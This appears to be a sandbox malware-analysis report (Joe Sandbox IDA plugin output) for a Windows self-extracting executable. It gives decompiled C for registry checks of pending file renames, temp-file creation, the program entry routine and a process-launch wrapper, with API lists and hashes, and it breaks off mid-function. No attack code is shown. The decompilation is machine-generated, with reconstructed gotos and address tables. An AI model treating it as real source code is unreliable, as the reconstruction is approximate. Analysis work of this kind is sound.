                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-510557316
                                                                                                                                                                                                        • Opcode ID: e22fd5453833591d113517a737247e68da5ea3a8ede2a1130d8df05393338494
                                                                                                                                                                                                        • Instruction ID: b2017bc9700f6cfbd7e9c5ee23973662128dd85ef14d38b1b28595dbd78a198d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e22fd5453833591d113517a737247e68da5ea3a8ede2a1130d8df05393338494
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D310A71700A046BDB305F299C45F7E77DAEBE5344B1401EEA405E3151DF70EE8186A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 519 bc256d-bc257d 520 bc2622-bc2627 call bc24e0 519->520 521 bc2583-bc2589 519->521 528 bc2629-bc262f 520->528 523 bc25e8-bc2607 RegOpenKeyExA 521->523 524 bc258b 521->524 525 bc2609-bc2620 RegQueryInfoKeyA 523->525 526 bc25e3-bc25e6 523->526 524->528 529 bc2591-bc2595 524->529 530 bc25d1-bc25dd RegCloseKey 525->530 526->528 529->528 531 bc259b-bc25ba RegOpenKeyExA 529->531 530->526 531->526 532 bc25bc-bc25cb RegQueryValueExA 531->532 532->530
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E00BC256D(signed int __ecx) {
                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t31 = E00BC24E0(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t13 - 1;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                        							if(_t24 == 0) {
                                                                                                                                                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                        								L6:
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                        								RegCloseKey(_v12); // executed
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t31 = _v8;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t31;
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00BC4096,00BC4096,?,00BC1ED3,00000001,00000000,?,?,00BC4137,?), ref: 00BC25B2
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00BC4096,?,00BC1ED3,00000001,00000000,?,?,00BC4137,?,00BC4096), ref: 00BC25CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00BC1ED3,00000001,00000000,?,?,00BC4137,?,00BC4096), ref: 00BC25DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00BC4096,00BC4096,?,00BC1ED3,00000001,00000000,?,?,00BC4137,?), ref: 00BC25FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00BC4096,00000000,00000000,00000000,00000000,?,00BC1ED3,00000001,00000000), ref: 00BC261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 00BC25C3
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 00BC25A8
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00BC25F5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
• Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: 67cde15b1d8b1808cc01aa60da273470a0dbc5216d601c36aa662bc2e725c3c3
                                                                                                                                                                                                        • Instruction ID: 9bf8854e0415d7bf798d1a6509e9fbca04a700a295e13a909688e8e86f70c856
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67cde15b1d8b1808cc01aa60da273470a0dbc5216d601c36aa662bc2e725c3c3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18115135942228BB9B20DB919C1DEFBBFFCEF157A6F1040A9B809F3110DA305E44D6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int* _t25;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed char _t41;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E00BC7155();
                                                                                                                                                                                                        				_push(0x58);
                                                                                                                                                                                                        				_push(0xbc72b8);
                                                                                                                                                                                                        				E00BC7208(__ebx, __edi, __esi);
                                                                                                                                                                                                        				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                        				_t53 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                        					if(0 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(0 != _t56) {
                                                                                                                                                                                                        						Sleep(0x3e8);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t58 = 1;
                                                                                                                                                                                                        						_t53 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_t67 =  *0xbc88b0 - _t58; // 0x2
                                                                                                                                                                                                        					if(_t67 != 0) {
                                                                                                                                                                                                        						__eflags =  *0xbc88b0; // 0x2
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							 *0xbc81e4 = _t58;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xbc88b0 = _t58;
                                                                                                                                                                                                        							_t37 = E00BC6C3F(0xbc10b8, 0xbc10c4); // executed
                                                                                                                                                                                                        							__eflags = _t37;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        								_t30 = 0xff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0x1f);
                                                                                                                                                                                                        						L00BC6FF4();
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t68 =  *0xbc88b0 - _t58; // 0x2
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_push(0xbc10b4);
                                                                                                                                                                                                        							_push(0xbc10ac);
                                                                                                                                                                                                        							L00BC7202();
                                                                                                                                                                                                        							 *0xbc88b0 = 2;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                                        							 *0xbc88ac = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t71 =  *0xbc88b4;
                                                                                                                                                                                                        						if( *0xbc88b4 != 0 && E00BC7060(_t71, 0xbc88b4) != 0) {
                                                                                                                                                                                                        							_t60 =  *0xbc88b4; // 0x0
                                                                                                                                                                                                        							 *0xbca288(0, 2, 0);
                                                                                                                                                                                                        							 *_t60();
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                        						_t59 =  *_t25;
                                                                                                                                                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t41 =  *_t59;
                                                                                                                                                                                                        							if(_t41 > 0x20) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							if(_t41 != 0) {
                                                                                                                                                                                                        								if(_t54 != 0) {
                                                                                                                                                                                                        									goto L32;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                        										_t59 = _t59 + 1;
                                                                                                                                                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        										_t41 =  *_t59;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t29 = 0xa;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(_t29);
                                                                                                                                                                                                        							_t30 = E00BC2BFB(0xbc0000, 0, _t59); // executed
                                                                                                                                                                                                        							 *0xbc81e0 = _t30;
                                                                                                                                                                                                        							__eflags =  *0xbc81f8;
                                                                                                                                                                                                        							if( *0xbc81f8 == 0) {
                                                                                                                                                                                                        								exit(_t30); // executed
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *0xbc81e4;
                                                                                                                                                                                                        							if( *0xbc81e4 == 0) {
                                                                                                                                                                                                        								__imp___cexit();
                                                                                                                                                                                                        								_t30 =  *0xbc81e0; // 0x0
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        							goto L40;
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							__eflags = _t41 - 0x22;
                                                                                                                                                                                                        							if(_t41 == 0x22) {
                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                        								_t15 = _t54 == 0;
                                                                                                                                                                                                        								__eflags = _t15;
                                                                                                                                                                                                        								_t54 = 0 | _t15;
                                                                                                                                                                                                        								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                        							__imp___ismbblead(_t26);
                                                                                                                                                                                                        							__eflags = _t26;
                                                                                                                                                                                                        							if(_t26 != 0) {
                                                                                                                                                                                                        								_t59 = _t59 + 1;
                                                                                                                                                                                                        								__eflags = _t59;
                                                                                                                                                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t59 = _t59 + 1;
                                                                                                                                                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L40:
                                                                                                                                                                                                        					return E00BC724D(_t30);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t58 = 1;
                                                                                                                                                                                                        				__eflags = 1;
                                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x00bc6b67
                                                                                                                                                                                                        0x00bc6b6c
                                                                                                                                                                                                        0x00bc6b6e
                                                                                                                                                                                                        0x00bc6b71
                                                                                                                                                                                                        0x00bc6b74
                                                                                                                                                                                                        0x00bc6b74
                                                                                                                                                                                                        0x00bc6b79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6b7d
                                                                                                                                                                                                        0x00bc6b81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6b83
                                                                                                                                                                                                        0x00bc6b8c
                                                                                                                                                                                                        0x00bc6b8d
                                                                                                                                                                                                        0x00bc6b90
                                                                                                                                                                                                        0x00bc6b90
                                                                                                                                                                                                        0x00bc6b83
                                                                                                                                                                                                        0x00bc6b81
                                                                                                                                                                                                        0x00bc6b94
                                                                                                                                                                                                        0x00bc6b98
                                                                                                                                                                                                        0x00bc6ba2
                                                                                                                                                                                                        0x00bc6b9a
                                                                                                                                                                                                        0x00bc6b9a
                                                                                                                                                                                                        0x00bc6b9a
                                                                                                                                                                                                        0x00bc6ba3
                                                                                                                                                                                                        0x00bc6bab
                                                                                                                                                                                                        0x00bc6bb0
                                                                                                                                                                                                        0x00bc6bb5
                                                                                                                                                                                                        0x00bc6bbc
                                                                                                                                                                                                        0x00bc6bbf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6bbf
                                                                                                                                                                                                        0x00bc6c1e
                                                                                                                                                                                                        0x00bc6c25
                                                                                                                                                                                                        0x00bc6c27
                                                                                                                                                                                                        0x00bc6c2d
                                                                                                                                                                                                        0x00bc6c2d
                                                                                                                                                                                                        0x00bc6c32
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6bc5
                                                                                                                                                                                                        0x00bc6bc5
                                                                                                                                                                                                        0x00bc6bc8
                                                                                                                                                                                                        0x00bc6bcc
                                                                                                                                                                                                        0x00bc6bce
                                                                                                                                                                                                        0x00bc6bce
                                                                                                                                                                                                        0x00bc6bd1
                                                                                                                                                                                                        0x00bc6bd3
                                                                                                                                                                                                        0x00bc6bd3
                                                                                                                                                                                                        0x00bc6bd6
                                                                                                                                                                                                        0x00bc6bda
                                                                                                                                                                                                        0x00bc6be1
                                                                                                                                                                                                        0x00bc6be3
                                                                                                                                                                                                        0x00bc6be5
                                                                                                                                                                                                        0x00bc6be5
                                                                                                                                                                                                        0x00bc6be6
                                                                                                                                                                                                        0x00bc6be6
                                                                                                                                                                                                        0x00bc6be9
                                                                                                                                                                                                        0x00bc6bea
                                                                                                                                                                                                        0x00bc6bea
                                                                                                                                                                                                        0x00bc6b74
                                                                                                                                                                                                        0x00bc6c39
                                                                                                                                                                                                        0x00bc6c3e
                                                                                                                                                                                                        0x00bc6c3e
                                                                                                                                                                                                        0x00bc6abe
                                                                                                                                                                                                        0x00bc6abe
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00BC7182
                                                                                                                                                                                                          • Part of subcall function 00BC7155: GetCurrentProcessId.KERNEL32 ref: 00BC7191
                                                                                                                                                                                                          • Part of subcall function 00BC7155: GetCurrentThreadId.KERNEL32 ref: 00BC719A
                                                                                                                                                                                                          • Part of subcall function 00BC7155: GetTickCount.KERNEL32 ref: 00BC71A3
                                                                                                                                                                                                          • Part of subcall function 00BC7155: QueryPerformanceCounter.KERNEL32(?), ref: 00BC71B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,00BC72B8,00000058), ref: 00BC6A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00BC6AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 00BC6AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 00BC6B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00BC6B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 00BC6BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 00BC6BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
                                                                                                                                                                                                        • Opcode ID: 0e06aaf8efc660c6697265219bfa2413426eb7b21922c2fb1c14a210a3e06597
                                                                                                                                                                                                        • Instruction ID: ab55928943c4bd898d4c530a19ff799f84373e40cf4b07fa2bf2b2aa024487e4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e06aaf8efc660c6697265219bfa2413426eb7b21922c2fb1c14a210a3e06597
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA41B271A482299FDB219B68DC46F6A77E4EB4D720F2441AEE841E72A1CF748C418B91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 587 bc58c8-bc58d5 588 bc58d8-bc58dd 587->588 588->588 589 bc58df-bc58f1 LocalAlloc 588->589 590 bc5919-bc5959 call bc1680 call bc658a CreateFileA LocalFree 589->590 591 bc58f3-bc5901 call bc44b9 589->591 594 bc5906-bc5910 call bc6285 590->594 601 bc595b-bc596c CloseHandle GetFileAttributesA 590->601 591->594 600 bc5912-bc5918 594->600 601->594 602 bc596e-bc5970 601->602 602->594 603 bc5972-bc597b 602->603 603->600
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00BC58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				signed char _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				CHAR* _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                                        				_t23 = __ecx + 1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t6 =  *_t27;
                                                                                                                                                                                                        					_t27 = _t27 + 1;
                                                                                                                                                                                                        				} while (_t6 != 0);
                                                                                                                                                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                                        					E00BC1680(_t20, _t36, _t33);
                                                                                                                                                                                                        					E00BC658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                        					_v8 = _t10;
                                                                                                                                                                                                        					LocalFree(_t20);
                                                                                                                                                                                                        					_t12 = _v8;
                                                                                                                                                                                                        					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						CloseHandle(_t12);
                                                                                                                                                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xbc9124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00BC44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					 *0xbc9124 = E00BC6285();
                                                                                                                                                                                                        					_t14 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00BC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC58E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00BC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00BC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00BC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00BC5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00BC5963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
• Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-188559970
                                                                                                                                                                                                        • Opcode ID: 2731d8cd92854eda050983c22e32b72040a59fbda38b246f388030ad71755567
                                                                                                                                                                                                        • Instruction ID: 0fd154452d740a0f6add0645db757c1606405567711d2d0d9d08711b0eb6c08d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2731d8cd92854eda050983c22e32b72040a59fbda38b246f388030ad71755567
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 331126716002147BD7241F7A5C4DF9B7FD9DF8A364B100699F506E3191CEB0A84582B0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 631 bc3fef-bc4010 632 bc410a-bc411a call bc6ce0 631->632 633 bc4016-bc403b CreateProcessA 631->633 634 bc40c4-bc4101 call bc6285 GetLastError FormatMessageA call bc44b9 633->634 635 bc4041-bc406e WaitForSingleObject GetExitCodeProcess 633->635 650 bc4106 634->650 638 bc4070-bc4077 635->638 639 bc4091 call bc411b 635->639 638->639 643 bc4079-bc407b 638->643 645 bc4096-bc40b8 CloseHandle * 2 639->645 643->639 644 bc407d-bc4089 643->644 644->639 647 bc408b 644->647 648 bc4108 645->648 649 bc40ba-bc40c0 645->649 647->639 648->632 649->648 651 bc40c2 649->651 650->648 651->650
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E00BC3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                        				long _v528;
                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t20;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t45 = __edx;
                                                                                                                                                                                                        				_t20 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                        				_t39 = __ecx;
                                                                                                                                                                                                        				_t49 = 1;
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return E00BC6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
